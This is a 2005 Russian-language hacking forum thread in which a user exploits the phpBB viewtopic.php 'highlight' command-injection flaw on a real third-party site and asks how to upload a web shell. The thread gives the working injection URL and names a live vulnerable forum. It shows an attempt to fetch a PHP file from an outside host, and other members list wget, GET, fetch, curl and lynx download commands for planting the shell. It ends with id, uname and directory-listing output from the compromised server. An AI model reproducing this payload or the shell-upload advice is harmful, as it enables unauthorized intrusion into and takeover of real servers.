ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

PhpBB Shell wget get
  #1  
Старый 03.11.2005, 23:51
Аватар для Shapka
Shapka
Новичок
Регистрация: 28.10.2005
Сообщений: 14
Провел на форуме:
15644

Репутация: 0
По умолчанию PhpBB Shell wget get

сервак с дырой /viewtopic.php?t=89&highlight=%2527.$poster=%60$cmd %60.%2527&cmd=id
короче я могу выполнять ls -la, cat, pwd... ps auа команду /viewtopic.php?t=89&highlight=%2527.$poster=%60$cmd %60.%2527&cmd=GET http://lol.lol.ru/lol.php > lol.php некак не проходит...
хотя выставил на папки chmod 0777 и все равно не льяется.....
вот подобный форум http://www.leo-clubs.fi/dev/
помогите кто может...
скажите команды я знаю get и wget не та не та не заливает и еще скажите команду создание нового пустого файла
 
Ответить с цитированием

  #2  
Старый 04.11.2005, 05:51
Аватар для Shapka
Shapka
Новичок
Регистрация: 28.10.2005
Сообщений: 14
Провел на форуме:
15644

Репутация: 0
По умолчанию

народ помогите команды вгет и гет не пашут!!!
 
Ответить с цитированием

  #3  
Старый 04.11.2005, 08:09
Аватар для k00p3r
k00p3r
Banned
Регистрация: 31.05.2005
Сообщений: 549
Провел на форуме:
484586

Репутация: 16


Отправить сообщение для k00p3r с помощью ICQ
По умолчанию

У меня такая же трабла была - создавася пустой файл вместо шелла. Я не стал особо думать и сдалал echo
Ищи другие качалки.
 
Ответить с цитированием

  #4  
Старый 04.11.2005, 08:14
Аватар для RevenAnt
RevenAnt
Познающий
Регистрация: 08.04.2005
Сообщений: 69
Провел на форуме:
207537

Репутация: 59
По умолчанию

wget, get, fetch, lynx, curl
тести ....
______
ну и канешно echo (как было сказано выше) ... всегда спасает

Последний раз редактировалось RevenAnt; 04.11.2005 в 08:16..
 
Ответить с цитированием

  #5  
Старый 04.11.2005, 14:15
Аватар для Jenizix
Jenizix
Новичок
Регистрация: 02.11.2005
Сообщений: 26
Провел на форуме:
60473

Репутация: 1
Отправить сообщение для Jenizix с помощью ICQ
По умолчанию

Wget: wget http://site.com/file.rar -O file.rar
GET: GET http://site.com/file.rar > file.rar
Fetch: fetch http://site.com/file.rar -o file.rar
Curl: curl --output file.rar http://site.com/file.rar
Lynx: lynx -source "http://site.com/file.rar" > file.rar
Links: тоже самое что и у lynx

Вроде так...
 
Ответить с цитированием

  #6  
Старый 04.11.2005, 14:37
Аватар для m0nzt3r
m0nzt3r
ветеран
Регистрация: 22.06.2004
Сообщений: 2,128
Провел на форуме:
5355463

Репутация: 2258


По умолчанию

ну обычно бывают wget и fetch .. ты сначала uname -a , если фряха то 99% будет fetch а так which fetch lynx wget curl get links =)
__________________
Elite VPN from Green. Quality. Click and buy!!!

Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze
 
Ответить с цитированием

  #7  
Старый 04.11.2005, 14:51
Аватар для Shapka
Shapka
Новичок
Регистрация: 28.10.2005
Сообщений: 14
Провел на форуме:
15644

Репутация: 0
По умолчанию

сейчас потестим, а вот еще проблема...
chomod 0777 index.php - результатов не дал
chomod 0777 index.php - результат дал!!!! но ведь я подряд их вводил
на папки тожне не могу chmod выставить

З.Ы. иногда бывает создается пустой файл, использую echo, а он в файл ниче не вставляет

Последний раз редактировалось Shapka; 04.11.2005 в 14:56..
 
Ответить с цитированием

  #8  
Старый 04.11.2005, 14:58
Аватар для m0nzt3r
m0nzt3r
ветеран
Регистрация: 22.06.2004
Сообщений: 2,128
Провел на форуме:
5355463

Репутация: 2258


По умолчанию

Цитата:
Сообщение от Shapka  
chomod 0777 index.php - результатов не дал
chomod 0777 index.php - результат дал!!!! но ведь я подряд их вводил
такс.. во первых не chomod а chmod] а во вторых ты же одинаковые команды вводил как это бывает что в первый раз не получилось а во второй раз получилось? если не получается chmod значит прав нет..
__________________
Elite VPN from Green. Quality. Click and buy!!!

Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze
 
Ответить с цитированием

  #9  
Старый 04.11.2005, 15:18
Аватар для Shapka
Shapka
Новичок
Регистрация: 28.10.2005
Сообщений: 14
Провел на форуме:
15644

Репутация: 0
По умолчанию

в том и фишка! на блин я немного ошибся 1й раз я пробовал на index.php а 2й раз на config.php на конфиг.пхп получилось а на индекс нет, потом пытался cat config.php и мне нечего не выдалось (
 
Ответить с цитированием

  #10  
Старый 04.11.2005, 15:30
Аватар для Shapka
Shapka
Новичок
Регистрация: 28.10.2005
Сообщений: 14
Провел на форуме:
15644

Репутация: 0
По умолчанию

вот такой расклад у меня получился
id
uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)

uname -a
FreeBSD systemplus.info 4.4-RELEASE FreeBSD 4.4-RELEASE #0: Wed Aug 28 19:41:18 GMT 2002 root@osbuilder:/usr/src/sys/compile/SERVER

Фряха, но fetch не пашет

ls -la

drwxr-xr-x 10 horus84 autoexpert.ro 1024 Aug 10 15:39 .
drwxrwxr-x 24 usr203226026 autoexpert.ro 1536 Aug 12 17:37 ..
drwxr-xr-x 2 horus84 autoexpert.ro 1024 Apr 28 2004 admin
drwxr-xr-x 2 horus84 autoexpert.ro 512 Apr 28 2004 cache
-rw-r--r-- 1 horus84 autoexpert.ro 5051 Apr 28 2004 common.php
-rw-r--r-- 1 horus84 autoexpert.ro 275 Apr 28 2004 config.php
drwxr-xr-x 2 horus84 autoexpert.ro 512 Apr 28 2004 db
drwxr-xr-x 2 horus84 autoexpert.ro 512 Apr 28 2004 docs
-rw-r--r-- 1 horus84 autoexpert.ro 810 Apr 28 2004 extension.inc
-rw-r--r-- 1 horus84 autoexpert.ro 4669 Jul 23 2004 faq.php
-rw-r--r-- 1 horus84 autoexpert.ro 45501 Jul 23 2004 groupcp.php
drwxr-xr-x 4 horus84 autoexpert.ro 512 Apr 28 2004 images
drwxr-xr-x 3 horus84 autoexpert.ro 1024 Aug 10 15:40 includes
-rw-r--r-- 1 horus84 autoexpert.ro 15406 Jul 23 2004 index.php
-rw-r--r-- 1 horus84 autoexpert.ro 14332 Apr 28 2004 index_040721.php
drwxr-xr-x 4 horus84 autoexpert.ro 512 Apr 28 2004 language
-rw-r--r-- 1 horus84 autoexpert.ro 7937 Jul 23 2004 login.php
-rw-r--r-- 1 horus84 autoexpert.ro 13175 Jul 23 2004 memberlist.php
-rw-r--r-- 1 horus84 autoexpert.ro 38682 Jul 23 2004 modcp.php
-rw-r--r-- 1 horus84 autoexpert.ro 34208 Jul 20 2003 posting.php
-rw-r--r-- 1 horus84 autoexpert.ro 72647 Jul 20 2003 privmsg.php
-rw-r--r-- 1 horus84 autoexpert.ro 3719 Apr 28 2004 profile.php
-rw-r--r-- 1 horus84 autoexpert.ro 43475 Jul 23 2004 search.php
drwxr-xr-x 4 horus84 autoexpert.ro 512 May 26 2004 templates
-rw-r--r-- 1 horus84 autoexpert.ro 24211 Jul 23 2004 viewforum.php
-rw-r--r-- 1 horus84 autoexpert.ro 8305 Jul 23 2004 viewonline.php
-rw-r--r-- 1 horus84 autoexpert.ro 46082 Jul 23 2004 viewtopic.php
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
PhpBB 2.0.15 Database Authentication Details Exploit VARVAR Форумы 11 01.02.2007 12:21
Очередные дыры: phpBB 2.0.14 rsha1988 Форумы 8 08.05.2005 18:48
Вопрос про заливку шелла в Powered by phpBB 2.0.8 © 2001 phpBB Group onyx3 Форумы 38 15.02.2005 16:25



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ